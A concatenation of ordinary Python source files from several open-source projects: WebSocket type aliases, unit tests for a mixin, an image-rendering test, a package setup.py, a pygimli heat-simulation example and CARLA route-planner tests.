try:
ExtensionParameter.__doc__ = ExtensionParameter__doc__ # type: ignore
except AttributeError: # pragma: no cover
pass
ExtensionHeader = Tuple[ExtensionName, List[ExtensionParameter]]
ExtensionHeader__doc__ = """Item parsed in a Sec-WebSocket-Extensions header"""
try:
ExtensionHeader.__doc__ = ExtensionHeader__doc__ # type: ignore
except AttributeError: # pragma: no cover
pass
Subprotocol = NewType("Subprotocol", str)
Subprotocol.__doc__ = """Items parsed in a Sec-WebSocket-Protocol header"""
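# Illustrative annotations (a sketch of how the aliases above are meant to be
# used in application code; the handler name and header values are examples,
# not taken from this file):
#
#   origin: Origin = Origin("https://example.com")
#   subprotocol: Subprotocol = Subprotocol("chat")
#   header: ExtensionHeader = (
#       ExtensionName("permessage-deflate"),
#       [("client_max_window_bits", None)],
#   )
#
#   async def echo(message: Data) -> Data:
#       return message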
|
tests/test_interface.py | Yuxiang1990/rising | 276 | 12746309 | <filename>tests/test_interface.py
import unittest
from rising import AbstractMixin
class Abstract(object):
def __init__(self, **kwargs):
super().__init__()
self.abstract = True
class AbstractForward(object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.abstract = True
class PreMix(AbstractMixin, Abstract):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class PostMix(AbstractForward, AbstractMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class MyTestCase(unittest.TestCase):
def test_pre_mix(self):
obj = PreMix(a=True)
self.assertFalse(hasattr(obj, "a"))
self.assertTrue(obj.abstract)
def test_post_mix(self):
obj = PostMix(a=True)
self.assertTrue(obj.a)
self.assertTrue(obj.abstract)
if __name__ == "__main__":
unittest.main()
|
tests/rankingscreentest_delete.py | ADoesGit/osr2mp4-core | 103 | 12746317 | import os
import unittest
from PIL import Image
from utils import getdrawer, abspath
from helper import assert_image_similar
class TestRankingScreen(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.tests = []
cls.update = False
cls.tests.append(getdrawer("", "syunn", (123123123, -1)))
cls.tests.append(getdrawer("2", "syunn", (123123123, -1)))
def testframes(self):
for i in range(len(self.tests)):
drawer = self.tests[i][1]
expectf = self.tests[i][0] + "rankingbruh.png"
for x in range(int(0.5 * drawer.settings.fps)):
drawer.draw_rankingpanel()
if self.update:
drawer.pbuffer.save(expectf)
else:
expect = Image.open(expectf).convert("RGBA")
assert_image_similar(drawer.pbuffer, expect, 5)
expectf = self.tests[i][0] + "rankingbruh1.png"
for x in range(int(0.6 * drawer.settings.fps)):
drawer.draw_rankingpanel()
if self.update:
drawer.pbuffer.save(expectf)
else:
expect = Image.open(expectf).convert("RGBA")
assert_image_similar(drawer.pbuffer, expect, 1)
if __name__ == '__main__':
unittest.main()
|
setup.py | khaxis/plynx | 137 | 12746318 | #!/usr/bin/env python
import os
import plynx
from setuptools import setup, find_packages
def parse_requirements(filename):
""" load requirements from a pip requirements file """
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
DIR = os.path.dirname(os.path.abspath(__file__))
install_requires = parse_requirements(os.path.join(DIR, 'requirements.txt'))
# Extra dependencies for storage
dev_reqs = parse_requirements(os.path.join(DIR, 'requirements-dev.txt'))
gs = [
"google-cloud-storage>=1.13.0",
]
s3 = [
"boto3>=1.9.62",
]
ssh = [
"paramiko>=2.4.2",
]
all_reqs = dev_reqs + gs + s3 + ssh
setup(
name='plynx',
version=plynx.__version__,
description='ML platform',
long_description='Interactive, Scalable, Shareable and Reproducible ML experiments',
url='https://plynx.com',
author='<NAME>',
author_email='<EMAIL>',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Visualization',
],
keywords='data science, machine learning, pipeline, workflow, experiments',
packages=find_packages(exclude=['scripts', 'docker']),
install_requires=install_requires,
extras_require={
'all': all_reqs,
'dev': dev_reqs,
'gs': gs,
's3': s3,
'ssh': ssh,
},
package_data={},
entry_points={
'console_scripts': [
'plynx=plynx.bin:main',
],
},
project_urls={
'Demo': 'https://plynx.com',
'Source': 'https://github.com/plynx-team/plynx',
},
# plynx.graph.base_nodes.collection uses reference to __file__
zip_safe=False,
)
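# Installation sketch (illustrative commands, not taken from the project
# docs; the extras names mirror the extras_require mapping defined above):
#
#   pip install plynx              # core dependencies only
#   pip install "plynx[gs,s3]"     # add Google Cloud Storage and S3 backends
#   pip install "plynx[ssh]"       # add paramiko-based SSH support
#   pip install "plynx[all]"       # gs + s3 + ssh plus the dev requirements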
|
doc/paper/cg17/example-1.py | baender/gimli | 224 | 12746340 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Minimal example of using pygimli to simulate the steady heat equation.
"""
import pygimli as pg
import pygimli.meshtools as mt
# Create geometry definition for the modelling domain
world = mt.createWorld(start=[-20, 0], end=[20, -16], layers=[-2, -8],
worldMarker=False)
# Create a heterogeneous block
block = mt.createRectangle(start=[-6, -3.5], end=[6, -6.0], marker=4,
boundaryMarker=10, area=0.1)
# Merge geometrical entities
geom = world + block
pg.show(geom, boundaryMarker=True, savefig='geometry.pdf')
# Create a mesh from the geometry definition
mesh = mt.createMesh(geom, quality=33, area=0.2, smooth=[1, 10])
pg.show(mesh, savefig='mesh.pdf')
# $\diverg(a\grad T)=0$ with $T(bottom)=1$, $T(top)=0$
T = pg.solver.solve(mesh,
a=[[1, 1.0], [2, 2.0], [3, 3.0], [4, 0.1]],
bc={'Dirichlet':{8:1.0, 4:0.0}},
verbose=True)
ax, _ = pg.show(mesh, data=T, label='Temperature $T$', cMap="hot_r",
nLevs=11, showBoundary=True, savefig='T_field.pdf')
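# Clarifying note (not part of the original example): the list passed as `a`
# maps region markers to conductivities -- markers 1-3 are the layers created
# by createWorld() and marker 4 is the embedded block with the low value 0.1 --
# while the Dirichlet dictionary {8: 1.0, 4: 0.0} imposes the fixed
# temperatures described above ($T(bottom)=1$, $T(top)=0$) on the
# corresponding boundary markers.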
|
PythonAPI/agents/navigation/test_global_route_planner.py | AbdulHoffmann/carla_carissma | 116 | 12746341 | <gh_stars>100-1000
import math
import unittest
import carla
from global_route_planner import GlobalRoutePlanner
from global_route_planner import NavEnum
from global_route_planner_dao import GlobalRoutePlannerDAO
class Test_GlobalRoutePlanner(unittest.TestCase):
"""
Test class for GlobalRoutePlanner class
"""
def setUp(self):
# == Utilities test instance without DAO == #
self.simple_grp = GlobalRoutePlanner(None)
# == Integration test instance == #
client = carla.Client('localhost', 2000)
world = client.get_world()
integ_dao = GlobalRoutePlannerDAO(world.get_map())
self.integ_grp = GlobalRoutePlanner(integ_dao)
self.integ_grp.setup()
pass
def tearDown(self):
self.simple_grp = None
self.dao_grp = None
self.integ_grp = None
pass
def test_plan_route(self):
"""
Test for GlobalROutePlanner.plan_route()
Run this test with carla server running Town03
"""
plan = self.integ_grp.plan_route((-60, -5), (-77.65, 72.72))
self.assertEqual(
plan, [NavEnum.START, NavEnum.LEFT, NavEnum.LEFT,
NavEnum.GO_STRAIGHT, NavEnum.LEFT, NavEnum.STOP])
def test_path_search(self):
"""
Test for GlobalRoutePlanner.path_search()
Run this test with carla server running Town03
"""
self.integ_grp.path_search((191.947, -5.602), (78.730, -50.091))
self.assertEqual(
self.integ_grp.path_search((196.947, -5.602), (78.730, -50.091)),
[256, 157, 158, 117, 118, 59, 55, 230])
def test_localise(self):
"""
Test for GlobalRoutePlanner.localise()
Run this test with carla server running Town03
"""
x, y = (200, -250)
segment = self.integ_grp.localise(x, y)
self.assertEqual(self.integ_grp._id_map[segment['entry']], 5)
self.assertEqual(self.integ_grp._id_map[segment['exit']], 225)
def test_unit_vector(self):
"""
Test for GlobalROutePlanner.unit_vector()
"""
vector = self.simple_grp.unit_vector((1, 1), (2, 2))
        self.assertAlmostEqual(vector[0], 1 / math.sqrt(2))
        self.assertAlmostEqual(vector[1], 1 / math.sqrt(2))
def test_dot(self):
"""
Test for GlobalROutePlanner.test_dot()
"""
self.assertAlmostEqual(self.simple_grp.dot((1, 0), (0, 1)), 0)
self.assertAlmostEqual(self.simple_grp.dot((1, 0), (1, 0)), 1)
def suite():
"""
Gathering all tests
"""
suite = unittest.TestSuite()
suite.addTest(Test_GlobalRoutePlanner('test_unit_vector'))
suite.addTest(Test_GlobalRoutePlanner('test_dot'))
suite.addTest(Test_GlobalRoutePlanner('test_localise'))
suite.addTest(Test_GlobalRoutePlanner('test_path_search'))
suite.addTest(Test_GlobalRoutePlanner('test_plan_route'))
return suite
if __name__ == '__main__':
"""
Running test suite
"""
mySuit = suite()
runner = unittest.TextTestRunner()
runner.run(mySuit)
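# Note: as the docstrings above state, these tests assume a CARLA server with
# Town03 loaded and listening on localhost:2000; with that in place the suite
# can be run directly, e.g. `python test_global_route_planner.py`.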
|